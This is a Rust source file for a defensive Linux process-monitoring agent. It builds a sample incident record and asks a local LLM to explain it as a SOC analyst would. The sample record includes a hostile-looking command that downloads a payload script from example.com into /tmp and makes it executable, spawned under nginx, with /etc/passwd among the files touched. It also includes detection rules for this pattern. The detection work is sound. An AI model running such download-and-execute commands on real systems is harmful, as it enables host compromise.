use anyhow::{Context, Result};
use clap::Parser;
use procdna_common::{ProcessPassport, RiskReason};
use serde_json::json;

#[derive(Parser, Debug)]
#[command(name = "procdna-agent")]
#[command(about = "ProcDNA single-host MVP agent")]
struct Args {
    #[arg(long, default_value = "http://127.0.0.1:11434")]
    ollama_url: String,

    #[arg(long, default_value = "qwen3.5:4b")]
    model: String,

    #[arg(long)]
    sample_ai: bool,
}

#[tokio::main]
async fn main() -> Result<()> {
    let args = Args::parse();

    if args.sample_ai {
        let passport = sample_process_passport();

        let ai_report = explain_with_local_llm(
            &args.ollama_url,
            &args.model,
            &passport,
        )
        .await?;

        print_incident_card(&passport, &ai_report);
        return Ok(());
    }

    println!("ProcDNA Agent starting...");
    println!("Mode: single-host MVP");
    println!("Next: run with --sample-ai to test local LLM integration.");
    Ok(())
}

fn sample_process_passport() -> ProcessPassport {
    ProcessPassport {
        host_id: "linux-mint-lab-01".to_string(),

        pid: 2841,
        ppid: 1422,
        uid: 33,

        process_name: "bash".to_string(),
        parent_chain: vec![
            "systemd".to_string(),
            "nginx".to_string(),
            "bash".to_string(),
            "curl".to_string(),
            "chmod".to_string(),
            "/tmp/procdna-demo.sh".to_string(),
        ],
        command_line: Some(
            "bash -c curl http://example.com/payload.sh -o /tmp/procdna-demo.sh && chmod +x /tmp/procdna-demo.sh".to_string()
        ),

        files_touched: vec![
            "/tmp/procdna-demo.sh".to_string(),
            "/etc/passwd".to_string(),
        ],
        network_connections: vec![
            "93.184.216.34:80".to_string(),
        ],
        children: vec![
            "curl".to_string(),
            "chmod".to_string(),
            "/tmp/procdna-demo.sh".to_string(),
        ],

        risk_score: 94,
        risk_reasons: vec![
            RiskReason {
                rule_id: "WEB_USER_SHELL".to_string(),
                description: "A web service parent process spawned a shell-like process".to_string(),
                score: 40,
            },
            RiskReason {
                rule_id: "SHELL_DOWNLOAD_TOOL".to_string(),
                description: "A shell process executed a network download tool".to_string(),
                score: 25,
            },
            RiskReason {
                rule_id: "TMP_EXECUTION".to_string(),
                description: "A file under /tmp was prepared for execution".to_string(),
                score: 25,
            },
        ],

        ai_summary: None,
        likely_scenario: None,
        recommended_actions: vec![],
    }
}

async fn explain_with_local_llm(
    ollama_url: &str,
    model: &str,
    passport: &ProcessPassport,
) -> Result<String> {
    let passport_json = serde_json::to_string_pretty(passport)?;

    let system_prompt = r#"
You are a local SOC analyst assistant.

You analyze Linux process passports generated by an eBPF-based security layer.

Rules:
- Use only the provided data.
- Do not invent facts.
- Do not provide offensive instructions.
- Focus on defensive analysis.
- Keep the explanation concise and useful for a SOC analyst.
"#;

    let user_prompt = format!(
        r#"
Analyze this Linux process passport.

Return:
1. One-sentence incident summary
2. Likely scenario
3. Why this matters
4. Recommended defensive actions
5. Evidence to preserve

Process Passport:
{}
"#,
        passport_json
    );

    let body = json!({
        "model": model,
        "stream": false,
        "messages": [
            {
                "role": "system",
                "content": system_prompt
            },
            {
                "role": "user",
                "content": user_prompt
            }
        ]
    });

    let client = reqwest::Client::new();
    let url = format!("{}/api/chat", ollama_url.trim_end_matches('/'));

    let response: serde_json::Value = client
        .post(url)
        .json(&body)
        .send()
        .await
        .context("failed to call Ollama API")?
        .error_for_status()
        .context("Ollama returned non-success status")?
        .json()
        .await
        .context("failed to parse Ollama response")?;

    let content = response
        .get("message")
        .and_then(|m| m.get("content"))
        .and_then(|c| c.as_str())
        .unwrap_or("No AI response content returned.");

    Ok(content.to_string())
}

fn print_incident_card(passport: &ProcessPassport, ai_report: &str) {
    println!();
    println!("╔════════════════════════════════════════════════════════════╗");
    println!("║                         ProcDNA                           ║");
    println!("║              AI-Native Linux Process Passport             ║");
    println!("╠════════════════════════════════════════════════════════════╣");
    println!("║ Host: {:<52} ║", passport.host_id);
    println!("║ PID: {:<53} ║", passport.pid);
    println!("║ Process: {:<49} ║", passport.process_name);
    println!("║ UID: {:<53} ║", passport.uid);
    println!("║ Severity: {:<48} ║", passport.severity());
    println!("║ Risk Score: {:<46} ║", format!("{}/100", passport.risk_score));
    println!("╠════════════════════════════════════════════════════════════╣");
    println!("║ Process DNA                                               ║");
    println!("║ {} ║", truncate(&passport.parent_chain.join(" → "), 58));
    println!("╠════════════════════════════════════════════════════════════╣");
    println!("║ Files touched                                             ║");
    for file in &passport.files_touched {
        println!("║ - {:<55} ║", truncate(file, 55));
    }
    println!("╠════════════════════════════════════════════════════════════╣");
    println!("║ Network connections                                       ║");
    for conn in &passport.network_connections {
        println!("║ - {:<55} ║", truncate(conn, 55));
    }
    println!("╠════════════════════════════════════════════════════════════╣");
    println!("║ Risk reasons                                              ║");
    for reason in &passport.risk_reasons {
        println!("║ - {:<55} ║", truncate(&reason.description, 55));
    }
    println!("╠════════════════════════════════════════════════════════════╣");
    println!("║ Local AI Explanation                                      ║");
    println!("╚════════════════════════════════════════════════════════════╝");
    println!();
    println!("{}", ai_report.trim());
    println!();
}

fn truncate(value: &str, max: usize) -> String {
    if value.chars().count() <= max {
        return value.to_string();
    }

    let mut out = value.chars().take(max.saturating_sub(3)).collect::<String>();
    out.push_str("...");
    out
}
